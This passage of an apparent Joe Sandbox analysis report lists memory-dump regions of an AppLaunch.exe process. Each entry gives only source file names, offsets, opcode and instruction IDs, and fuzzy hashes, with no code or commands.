                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BF51E231B002259BDB14AB79D414A7EB7F7AFC8394B258129EC06E7344EF709D128BD2
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2626382612.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_6a20000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: f2082e7cf6bbd17019fc2d7c46d470ebf4f8fedaf91ee00f5e104665bacb883c
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 53b3b26bd53b7bff67361429e8b9711bc3f0584999e29f76353ca9d39053283f
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f2082e7cf6bbd17019fc2d7c46d470ebf4f8fedaf91ee00f5e104665bacb883c
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E9510730604386CFD721DF78E8946AA7FF2EF8A204B14866DD446CB751DB78E905C7A1
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2646148974.0000000009120000.00000040.00000800.00020000.00000000.sdmp, Offset: 09120000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9120000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: fb7097ccce43f5be539938ea6e05640e041472398b52d913b4d5c16d6d7dfb2a
                                                                                                                                                                                                                                                                                                                  • Instruction ID: e1fb8a4749ba59b0abba63071f88531aadab792b03802be7dd1df97f5bbbc251
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fb7097ccce43f5be539938ea6e05640e041472398b52d913b4d5c16d6d7dfb2a
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BB51DF31B006269FCB04EF69C89096ABBB5FF89314B11C26AE529DB391D770BC51CBD0
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2653231216.0000000009DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09DA0000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9da0000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: b0f884fcbc9ad67c93d3399295892ab5d05f05f46e05a39d00ebaa21db39bcda
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 12b4da75cd90d83d3bf614ff07413d73a70ff02dfa7d0c6180190c7fc5c97253
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b0f884fcbc9ad67c93d3399295892ab5d05f05f46e05a39d00ebaa21db39bcda
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A651D330615245CFCB05CF29C484959BBF2FF8A324B29C99AD499DB762D735EC06CB50
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2653231216.0000000009DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09DA0000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9da0000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: ef6a01908c337da1539a732706d3e6c3c1419bbaf3811f9f391050699d16c1e9
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 8896f7df00c72f0ed13a4cfd02d54cf9eae563f2ee2e296670439b828e5a3ba3
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ef6a01908c337da1539a732706d3e6c3c1419bbaf3811f9f391050699d16c1e9
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A8516A75A002099FCB14DF6DD49099EBBF5EF88324B1580AAE659DB721DB30EC01CBA0
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2646148974.0000000009120000.00000040.00000800.00020000.00000000.sdmp, Offset: 09120000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9120000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 45cda577929ec1a9b5ea429c457ae6af547945d9ccb0c629ca03cefc8fcedff8
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 9d05c0acf2a8548d743aa9981b77c2e48000b841b63d01b8f2e44407a7c1f956
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 45cda577929ec1a9b5ea429c457ae6af547945d9ccb0c629ca03cefc8fcedff8
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 78614B31E0071ADFDB11EF68C550999BBB1FF89308F118759E459BB220EB70EA95CB80
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2653231216.0000000009DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09DA0000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9da0000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: e695b9c69db3bfbf1188605a416acfbd43222d5d3dd53020cb6b6da4c0276cfd
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 6c24d04ffef5b4d7528a23925402bc5ac087733e360d9438d039f2dd5d7159f6
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e695b9c69db3bfbf1188605a416acfbd43222d5d3dd53020cb6b6da4c0276cfd
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B44170317442048FC714EF79D458A1ABBEAEF89655B1980AAF509CFBB2DB71DC01CB90
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2654013369.0000000009E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E10000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9e10000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 0e3c08cc9667b16c69edc482192f40debc4220a970980035c02794ae30832fb6
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 2963067146cd5142ba05f75fd5cdd8d0c6ba792b20ca933861758861d572b12a
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0e3c08cc9667b16c69edc482192f40debc4220a970980035c02794ae30832fb6
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7A512535B401189FCB14CFA9C8849AEBBB6FF8D314B158069F915AB361EB31ED05CB50
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2654013369.0000000009E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E10000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9e10000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 1b18a88979e5209e1283edad3e64d948999d0e32f496c956f78a672a54157937
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 95d8014336e22cb230f6dca8f7dda29cc3a3c26dcba25bf9f4bce3c2e561f494
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1b18a88979e5209e1283edad3e64d948999d0e32f496c956f78a672a54157937
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 45511635B002199FCB04CF69C99499ABBF2EF8D314B118069F905AB3A1EB70EC05CB90
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2654013369.0000000009E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E10000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9e10000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 0ac2f7dbb06ade76fa14354c614e131324ff6dcc01ab453ef5cb247937f203ff
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 4bd9f1a890739a9901a0ca6bc0a88eb4ca3a49797bc54f4e591ca53e483d19b9
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0ac2f7dbb06ade76fa14354c614e131324ff6dcc01ab453ef5cb247937f203ff
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 65510930B082459FDB118F69C8117BF7BBAAF89708F158055E202DB7A6DB75DD0187D2
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2646148974.0000000009120000.00000040.00000800.00020000.00000000.sdmp, Offset: 09120000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9120000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: f6415d5189b5145bcba673984f7135d261423b212afb1b3e360778e66e3ea4c3
                                                                                                                                                                                                                                                                                                                  • Instruction ID: ee49ed7ba18a0b6483db8840b13abff43cf6ff73baf18de19912df597f186420
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f6415d5189b5145bcba673984f7135d261423b212afb1b3e360778e66e3ea4c3
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BC41E831B002545FEB14AFB9A81467FBBEAEBC5250B54806AFD05DB380EF349C05C7A1
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2653231216.0000000009DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09DA0000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9da0000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 90733c178a2ccf31ebd3f8b4002f06e55a10e2457c3b7761cd0b365bcaf689fa
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 8cf9d5a1cb6f3cfd5081744fca652f2fb547f1efbe33d55b4c9976de01b579ed
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 90733c178a2ccf31ebd3f8b4002f06e55a10e2457c3b7761cd0b365bcaf689fa
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3A4104397493108FC722CB69D88095BBBF5EF85720319C4AEE959CBA25DA31EC15C790
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2646148974.0000000009120000.00000040.00000800.00020000.00000000.sdmp, Offset: 09120000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9120000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 896cc77126645b49104a64e93b2836a3b53693abf624bc4a6c757ded7502fe18
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 8c8fe433f48b951e3b4c0b29efcfb6f864f60c902315b33e6ea3d57efd20d9e6
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 896cc77126645b49104a64e93b2836a3b53693abf624bc4a6c757ded7502fe18
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E84193347842368BE718B735A51423DA6AB9BCE74CF524028ED16D7384EF64EC07ABD1
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2653231216.0000000009DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09DA0000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9da0000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 031abf49f714e5acbb57a4638c53be7d10b59df9fe5977d89c38d04a7119a8be
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 6996cb6feb2a23fd4e915c24b083c9ba4f30141e9d0ab907bf2dc65427292f00
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 031abf49f714e5acbb57a4638c53be7d10b59df9fe5977d89c38d04a7119a8be
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0A417B31A002098FDB14DF68E890AAEBBF6EF85314F15C56DE6199B311DB71FD068B90
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2654013369.0000000009E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E10000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9e10000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: ce4d17409681a78f3116234da3a5373659b45ce5361867736435d959eab2f6d1
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 20cbf1d1a49a620f078bdf994adc6900a4c150209947d07dc176a9119ccbd83c
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ce4d17409681a78f3116234da3a5373659b45ce5361867736435d959eab2f6d1
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C4416D717001049FCB04CFA9C954EABBBF6EF98714F158069E618EB3A1CB31EC018BA1
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2646148974.0000000009120000.00000040.00000800.00020000.00000000.sdmp, Offset: 09120000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9120000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: eb859b29427556427167e4ebf1690c17249763ef8b588123f92706005ae2e958
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 427e7da5da26ff5eda11dffa7ff53913526d1afe1e369bb9847ede207f85a20b
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eb859b29427556427167e4ebf1690c17249763ef8b588123f92706005ae2e958
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EA41D031B043405FD715AB7A9814A6ABFFAEFCA21471980AEE845CB361EB34DC05C7A1
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2646148974.0000000009120000.00000040.00000800.00020000.00000000.sdmp, Offset: 09120000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9120000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: a87fdb23b76522965478776907879016407cea7109bbff814e01aa5dd982068d
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 86b0a6468bbbc8d5bdb806665f3b07e7df783126b591a09d464ccb4740a812d8
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a87fdb23b76522965478776907879016407cea7109bbff814e01aa5dd982068d
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E6519F30200746DFDB21DF79E4946A6BBB1EF49208B04CA6DD4898B796D730F949CBD1
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2626382612.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_6a20000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: d9e01c27aacc9cc09a7009aea7a04132446f3a2809ad40c79214be8e6b890940
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 6ddad9117704b03a6840515ce553de97be62569586e4a970f467bd8b8ab543c3
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d9e01c27aacc9cc09a7009aea7a04132446f3a2809ad40c79214be8e6b890940
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AB41D6329047568FDB02EF78D8602EABBB0FF86308B14856AC455A7341EB34A945CBD1
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2646148974.0000000009120000.00000040.00000800.00020000.00000000.sdmp, Offset: 09120000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9120000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: c218e2ecdec5078e34545d29fbcc6fe54c8ee2c692a25bfa5347c5fd670820ed
                                                                                                                                                                                                                                                                                                                  • Instruction ID: f935978fff057163f5aa4f8383f537bed553c134eaf99cd46936133060a001ad
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c218e2ecdec5078e34545d29fbcc6fe54c8ee2c692a25bfa5347c5fd670820ed
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3B418E35B042059FDB05DFA8D898AAABBF6FF89304F144469E515EB361DB34A841CB90
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2626382612.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_6a20000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 059b8beaf4398719e2b8717ec176f9565762748a62ea88c16601a603f76aed15
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 89d926ed8d1cf16a5a28e912a9d0398c81574e3f71991b299c4beb6800b530b5
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 059b8beaf4398719e2b8717ec176f9565762748a62ea88c16601a603f76aed15
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E2311531704358AFDB14AB79EC04B9E7BA6EB86334F208279F915CB2D0CA359805C7A1
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2646148974.0000000009120000.00000040.00000800.00020000.00000000.sdmp, Offset: 09120000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9120000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 3c8a96a1081523b488baedefe43210897ae67089ad87a92ab39bbd104b6622a6
                                                                                                                                                                                                                                                                                                                  • Instruction ID: b9cf6432562a8c411f197d42e2c54be09c20cf419be08f0175d9841553c30f82
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3c8a96a1081523b488baedefe43210897ae67089ad87a92ab39bbd104b6622a6
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9D418F303003469FDB15DF39E854AAE7BE6EFC9214B10856DE94ACB261EB70EC158B90
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2653231216.0000000009DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09DA0000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9da0000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 441d2cbd728712cb47d71d05332092a6debe40a586cd7ac5f6a1414693dcb957
                                                                                                                                                                                                                                                                                                                  • Instruction ID: b9b924e7c3c6637e29ce37db8aa7e7a16150dbf6aa257fd7c43068454a28dd26
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 441d2cbd728712cb47d71d05332092a6debe40a586cd7ac5f6a1414693dcb957
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A2417C313402408FD315EB75E469B6EB7B6EB89314B05CA2CD6468B7A0DF71B906CB91
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2654013369.0000000009E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E10000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9e10000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: df35f0e907550dbbee7a9f11cbe516c9c5931c2e23897b84e05a92c286b00d38
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 95835c6d1a02f1483a517742c0fd607806c73eec2806b029fe773f78d5fda42c
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: df35f0e907550dbbee7a9f11cbe516c9c5931c2e23897b84e05a92c286b00d38
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1041B475B001049FCB04DF69C9989AEBBF6FF88714B2540A9F606DB3A1DB71ED408B50
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
